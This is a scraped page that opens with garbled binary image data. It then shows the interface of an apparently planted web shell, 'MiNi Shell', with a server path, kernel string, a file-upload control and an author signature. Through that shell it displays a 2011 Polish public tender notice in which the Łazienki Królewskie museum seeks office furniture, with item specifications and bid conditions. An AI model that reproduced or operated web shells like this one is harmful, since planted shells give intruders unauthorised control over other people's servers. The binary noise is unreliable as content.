JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/108705-N-2011.html

<p class="kh_header"><b>Warszawa: Przedmiotem zamówienia jest dostawa mebli  biurowych</b><br>
<b>Numer ogłoszenia: 108705 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Łazienki Królewskie - Zespół Pałacowo-Ogrodowy , ul. Agrykoli 1, 00-460 Warszawa, woj. mazowieckie, tel. 022 50 60 197, 50 60 174, faks 022 50 60 174.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lazienki-krolewskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa mebli  biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.  LADA RECEPCYJNA  wykonana z płyty melaminowej, front łukowy  w kolorze aluminium,  składająca się z;
  3  elementów dolnych o wymiarach:
a/  160x70x75,8; b/ 70x70x75,8; c/ 80x70x75,8;  
oraz z 3 elementów górnych o wymiarach:
a/ 160x30x35,2; b/ 70x70x35,2; c/ 80x30x35,2 
Preferowany kolor kremowy, jasno szary, perłowy - do uzgodnienia z zleceniodawcą  po przedstawieniu próbnika kolorów.
1.2.  SZAFA  aktowa pełna  o wymiarach: 80x35x198 cm;    
              SZAFA ubraniowa o wymiarach:80x59x198cm. wyposażona w metalowy drążek i    górną półkę. 
              Szafy  wykonane z płyty melaminowej o grubości 18 mm, w klasie higieniczności E1 o podwyższonej trwałości, obrzeże płyty oklejone PCV 1mm, wieńce szaf z płyty o grubości 25 mm. Półki wykonane z płyty melaminowej o grubości 18 mm, wykończone obrzeżem oklejonym PCV 1 mm, możliwość zmiany poziomów półek. 
Nóżki regulowane, uchwyty metalowe satynowe. Plecy tylne wykonane z płyty meblowej, dwustronnie malowane w kolorze białym, grubości  8mm. Plecy tylne muszą być wklejone w wyfrezowane w wieńcu dolnym, górnym i bokach rowki.
Drzwi płytowe zamontowane do boków korpusu za pomocą zawiasów puszkowych o kącie otwarcia 1000. Zamek z numerowanym cylindrem, numerowanym kluczykiem, jeden klucz łamany. Zamek systemowy co oznacza możliwość skompletowania jednego klucza na pracownika, którym otworzy wszystkie swoje meble.
1.3.REGAŁ  na korespondencję o wymiarach 90x38x185 
Regał podzielony ściankami na moduły o wymiarach wewnętrznych 25cmx15cm,  z dolną szafką zamykaną  na klucz,  wykonany z płyty melaminowej o grubości 18 mm w klasie higieniczności E-1 o podwyższonej trwałości. Nóżki regulowane. Zgodnie z rysunkiem .
1.4. KONTENER POD BIURKO o wymiarach  430/450/570,
Kontenery  3 szufladowe, wykonane z płyty melaminowej o grubości 18 mm, w klasie higieniczności E1 o podwyższonej trwałości, obrzeże płyty oklejone PCV 1mm, wieńce z płyty o grubości 25 mm.  Szuflady na prowadnicach kulkowych pełnego wysuwu z spowalniaczami i mechanizmem dociągającym, wykończone obrzeżem oklejonym PCV 1 mm. Nóżki regulowane, uchwyty metalowe satynowe. 
1.5. BIURKO o wymiarach 140x80x74
Blat z płyty laminowanej typ  HPL nr 406 o grubości 20 mm, odpornej na zarysowania i zalania. Podstawa biurka: chromowane kwadratowe stalowe rury o wym.  40mmx40mm. 
Preferowany kolor  kremowy, jasno szary , perłowy - do uzgodnienia z zleceniodawcą po            przedstawieniu próbnika kolorów.
1.6. FOTEL  OBROTOWY
Fotel  wyposażony w  dobry mechanizm ruchowy Synchro, polegający na równoczesnym ruchu (bujaniu się) oparcia i siedziska z możliwością blokady w każdej wybranej pozycji. Oparcie wychyla się z siedziskiem jednocześnie, ale ruch oparcia jest szybszy i wyraźniejszy aniżeli ruch siedziska,  ciągły kontakt oparcia z plecami użytkownika, jeśli wybrana pozycja wychylenia nie jest zablokowana, oparcie nieustannie podąża za plecami użytkownika gwarantując im odpowiednie podparcie podczas pracy. Siła oporu (podparcia pleców) jaki stawiać będzie oparcie jest regulowana, co pozwala dostosować ją do wagi użytkownika. Płynna regulacja wysokości siedziska za pomocą podnośnika pneumatycznego, regulacja głębokości siedziska (odległości siedziska od oparcia), dzięki której, funkcje oparcia dostępne zarówno dla niskich jak i wysokich użytkowników, jednym ruchem dźwigni można oddalić lub przybliżyć siedzisko do oparcia. Oparcie tapicerowane trwałą i praktyczną siatką, która odpowiednio dopasowuje się do pleców użytkownika, a także zapewnia dobrą cyrkulacje powietrza.  Oparcie wyposażone w profil części lędźwiowej kręgosłupa, który posiada regulację wysokości co pozwala dostosować go do wzrostu użytkownika. Regulowana wysokość podłokietników pozwala na wygodne i ergonomiczne ułożenie przedramienia; ergonomiczne ułożenie przedramienia (90 stopni względem tułowia) . Nakładki podłokietników posiadają również regulację kąta położenia nakładek, ich skierowanie do wewnątrz ułatwia pisanie na klawiaturze, zaś skierowanie do zewnątrz ułatwia wstawanie z krzesła. Zamawiający informuje, że dopuści wszystkie fotele spełniające powyższe wymagania. Jednym z takich foteli jest fotel z rodziny FUTURA.
Wymiary modelu: 
Kolor ciemno szary lub czarny.
1.7. SOFA - 3 osobowa. Prosta forma o wymiarach 170x42x48
Wykonana z materiału skóro podobnego wysokiej jakości i trwałości-, tapicerowana,  regulowane nóżki. Kolor materiału do uzgodnienia z zamawiającym.
2. SALA KONFERENCYJNA PARTER
2.1. STÓŁ KONFERENCYJNY  o wymiarach  180x90x74cm
Wykonany z płyty laminowanej /drewno o grubości 40mm, odpornej na zarysowania i zalania, na podstawie wykonanej z rur stalowych chromowanych o wymiarach 40mmx40mm. Stopki tworzywo sztuczne. Kolor  laminatu /drewna - Venge. 
2.2. BUFET -KREDENS  mebel gotowy o wymiarach  170x40x100cm 
Panel szczytowy: płyta pilśniowa/drewno/ABS, kolor Genge
Panel boczny , spodni , przegroda  j.w.
Półka z płyty pilśniowej /drewno, kolor venge
Tył - płyta pilśniowa, cokół płyta pilśniowa/ drewno ABS, kolor venge.
2.3.KRZESŁO KONFERENCYJNE o wymiarach szer. 47cm; gł. 47cm; wys.85 cm; 
Siedzisko: szer.42cm; gł. 42cm; wys.43cm;
Wykonane z  jednego fragmentu wyprofilowanej sklejki, okleina dębowa, bejca ciemny brąz/venge, bezbarwny lakier akrylowy. Nogi z stalowej chromowanej rurki.
3.Pozostałe meble 
3.1. STÓŁ  KONFERENCYJNY (Dział Inwestycji) o wymiarach 200x90x74  i o wymiarach 160x90x74
Stół wykonany z płyty melaminowej, blat o grubości 25mm, obrzeże płyty 25mm, oklejone PCV 2mm, Noga stołu wykonana płyty melaminowej. Kolor grusza calvados
3.2. SZAFY NA RYSUNKI
Szafa na rysunki  i mapy o formacie max A0. Ściany boczne i tylna wykonane z blachy stalowej gr, 0,8 mm, pozostałe elementy z blachy 1,0 mm.  Szuflady na prowadnicach kulkowych o pełnym wysuwie, zabezpieczone przed wypadaniem. Szafa zamykana zamkiem centralnym. Wysuw szuflady 600 mm.  5 szuflad.
Wymiary  zewnętrzne: 1315x920x425mm
Wymiary wewnętrzne szuflad : 1235x895x45mm
Kolor RAL 8017
3.3. Szafki  Kuchenne
Korpus wykonany z płyty meblowej laminowanej w kolorze białym,  grubość 18mm, oklejona PCV grubości 1mm .
Wszystkie fronty szafek wykonane z płyty MDF foliowanej grubości 19 mm.   Półki  z płyty laminowanej Uchwyty do ustalenia z zamawiającym
Nóżki regulowane, cokoły z płyty MDF foliowanej  o grubości 19mm, mocowane na zatrzaskach. 
 Ilość i wymiary: 
2 szt wisząca  z półkami- szer. 80cm, gł. 35 cm, wys.60 cm, 1 szt. stojąca z półkami - szr.80cm, gł.55 cm,  wys. 90cm, , 1 szt. wisząca z półkami szer. 60 cm, gł. 35 cm, wys. 60cm,   1 szt. wisząca z ociekaczem - szer. 80 cm, gł. 35 cm, wys. 60 cm,  1 szt..- szer.80 cm, gł. 55cm, wys. 90cm. ( pod zlewozmywak  bez blatu), 1 szt. szer.80cm, gł.55 cm, wys.90 cm (  z blatem pod zlewozmywak). Blat kuchenny, wykonany z płyty wiórowej pokrytej HPL  /systemowy/. 
 Preferowany kolor biały lub perłowy , blat kuchenny  - do uzgodnienia z zamawiającym po przedstawieniu wzornika.
4. DZIAŁ OBSŁUGI PUBLICZNOŚCI, I GABINET DYREKTORA
4.1. BIURKO  o wymiarach  180x90x74 
Blat: laminowana płyta HPL, nr 406, 20 mm, odporna na zarysowania i zalania, 
kolor laminatu: kremowy
Długość: 180 cm
Szerokość: 90 cm
Wysokość: 74 cm
Podstawa: chromowane, kwadratowe stalowe rury, 40x40 mm
Stopki: tworzywo sztuczne, białe
4.2.REGAŁ  biurowy otwarty 
(opracowany obustronnie - możliwa funkcja meblościanki)
Szerokość: 149 cm
Głębokość: 39 cm
Wysokość: 149 cm
ścianka zewnętrzna: 5 cm
ścianka wewnętrzna: 1,5 cm
półka wewnątrz: 34x34 cm
Części główne: Płyta wiórowa, Płyta pilśniowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), Farba akrylowa biała
Wypełnienie: papier
Półki: Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), folia melaminowa biała
Nogi: średnica: 3 cm; wysokość: 11-12 cm, regulowana 
Płytka montażowa: stal galwanizowana
Noga: stal nierdzewna
4.3. WKŁADY DO REGAŁU BIUROWEGO j.w.
Wkłady do regału biurowego  ruchome, z 2 szufladami
(możliwość dowolnej aranżacji - zmiana położenia wkładu w układzie półek)
Szerokość: 33 cm
Głębokość: 37 cm
Wysokość: 33 cm
Front szuflady: Płyta wiórowa, folia, tworzywo ABS, kolor biały
Spód szuflady: Płyta pilśniowa, farba biała
4.4. FOTEL OBROTOWY (różne kolory)
Średnica podstawy jezdnej: 700 mm
Zakres regulacji podłokietników: 185-265 mm
Wysokość siedziska: 430-525 mm
Wysokość fotela z oparciem: 890-1040 mm
Podstawa: Stabilna pięcioramienna, wykonana z polerowanego aluminium. Samohamowne kółka do powierzchni twardych 
(pokryte cienką oponką). 
Siedzisko: łagodnie opadający przód, płynnie regulowana wysokość. 
Oparcie: wyprofilowane ergonomicznie, tapicerowane z obydwu stron. 
Funkcja Up&Down: płynnie regulowana wysokość oparcia i podparcia lędźwi. 
Odchylanie siedziska: odchylanie synchronicznie z oparciem w stosunku 1:2. Regulowana siła oporu oparcia. Możliwość blokady siedziska i oparcia w kilku pozycjach. 
Anti-Shock - zabezpieczenie przed uderzeniem oparcia w plecy po zwolnieniu blokady ruchu. 
Podłokietniki: regulowane (w pionie i poziomie) z miękkimi poliuretanowymi nakładkami. 
Tkanina obić tapicerskich:
a) test martindale: 100 000 cykli.
- oznacza odporność mechaniczną na ścieranie - test konstrukcji tkanin
b) atest niepalności:
- niepalność na papieros wg normy eur.:  PN EN 1021-1: 2007
- niepalność na zapałkę wg normy eur.: EN 1021-2: 2007
Kolory obić tapicerskich: 10 kolorów: YN-108 (szary), YN-148 (pomarańcz), YN-076 (ciemny pomarańcz), YN-079 (czerwień), YN-204 (fiolet), YN-210 (granat), YN-200 (jasny zielony), YN 159 (ciemny zielony), YN-097 (niebieski), YN-206 (ciemny szary).
4.7. KRZESŁO KONFERENCYJNE  okleina brzoza
Szerokość: 47 cm
Głębokość: 47 cm
Wysokość: 85 cm
Szerokość siedziska: 42 cm
Głębokość siedziska: 42 cm
Wysokość siedziska: 43 cm
Rama nóg: chromowana stal
Tył/siedzisko: sklejka, okleina brzozowa, 
farba akrylowa  biała
4.8. STÓŁ KONFERENCYJNY  - SZKLANY BLAT
Długość: 180 cm
Szerokość: 85 cm
Wysokość: 74 cm
Podstawa: chromowane, kwadratowe stalowe rury, 40x40 mm
Stopki: tworzywo sztuczne, białe
Blat: szkło hartowane białe
4.9. SZAFKA BIUROWA /BUFET - drzwi przesuwane
Szerokość: 140 cm
Głębokość: 50 cm
Wysokość: 75 cm
Panel szczytowy: Płyta pilśniowa, folia biała
Panel spodni/ Panel boczny/ Przegroda: Płyta wiórowa, folia melaminowa biała
Półka: Płyta wiórowa, folia melaminowa biała
Drzwi, przesuwane: Płyta wiórowa, folia biała
Tył: Płyta pilśniowa, farba akrylowa biała
5.0. LAMPA NA  BIURKO  NA PODSTAWIE
Reflektor: aluminium
Podstawa: stal, farba srebrna
Klosz: stal, farba srebrna
Łącznik: tworzywo poliwęglowe
Trzonek: stal, chromowana powłoka
Szkło ochronne: szkło
Wysokość: 50 cm
Średnica podstawy: 18 cm
Średnica klosza: 10 cm
Długość kabla: 196 cm
Moc: 40 Wat
ZESTAWIENIE  ILOŚCIOWE I WARTOŚCIOWE MEBLI BIUROWYCH I KRZESEŁ -  Zgodnie z załącznikiem Nr 1A.
Zestawienie ilościowo-wartościowe z uzupełnieniem cen jednostkowych i kwoty  razem do uzupełnienia przez sprzedającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 39.10.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy którzy. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizowali co najmniej dwie dostawy mebli biurowych o wartości nie mniejszej niż 30.000,00 zł netto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia (w dniach) - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lazienki-krolewskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lazienki-krolewskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 13:00, miejsce: Muzeum Łazienki Królewskie - Zespół Pałacowo-Ogrodowy, ul. Agrykoli 1, 00-460 Warszawa, budynek Podchorążówki, w Sekretariacie, pokój 01, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com